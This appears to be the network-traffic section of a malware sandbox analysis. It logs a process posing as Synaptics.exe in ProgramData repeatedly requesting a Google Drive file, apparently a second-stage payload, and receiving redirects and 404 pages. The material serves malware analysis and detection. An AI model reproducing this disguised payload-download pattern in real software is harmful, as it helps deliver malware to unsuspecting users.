                                                                                                            2024-11-15 10:23:45 UTC142INData Raw: 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: pan></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.1649754142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:45 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:45 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4AEcD5BCGIruSbU78IRBOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC5ieBayJDvdRDAPXr03Cf5LmNkqrMiW2zX8_Rd8VBVUHn1XAuCp-EBV_g81Imd-ywT9dQjtwr6dSQ
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:45 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:23:45 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 6e 53 45 47 5a 4c 74 42 79 74 38 70 6d 6f 6b 51 75 4b 68 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="jnSEGZLtByt8pmokQuKhYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:23:45 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.1649753142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:45 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kh_uDjIomLfP7NHL2cCNhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.1649751142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:45 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TkE2KyFkh9F7lLM6sMLDJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.1649755142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:46 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:46 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-u-1-NnUShzyzCq6QCmmMlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.1649756142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:46 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:46 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dpdHYbzVlTWjZxf1x7Siag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.1649757142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:46 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:46 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-F8jo_QnAwesnAN858b8Wbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC5WJGXwo2vmxjLMj8mGNy0sEowhjmmIR-1EG5yxlVQ1OdklsDsFvUA6Amis4WIJhW9zpyKbbK2unA
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:46 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:23:46 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 72 62 68 5a 43 57 43 74 32 56 34 46 65 51 77 34 38 65 4b 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="_rbhZCWCt2V4FeQw48eKGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:23:46 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.1649758142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:46 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:46 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-e68TODCjM1OVanXeHrZZDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC6y7Wk_LQrmjd-nTkB_x27OFBKo3YevUMeNkgQpmeOBgss5xjzdLVNaKltTHcF3px23SDe5q9_wug
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:46 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:23:46 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 68 51 4c 31 30 65 46 54 6e 68 46 46 6e 78 53 6f 64 76 4a 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="9hQL10eFTnhFFnxSodvJVg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:23:46 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.1649768142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:37 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-63EXhVa68WeEFZQTSa0S4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
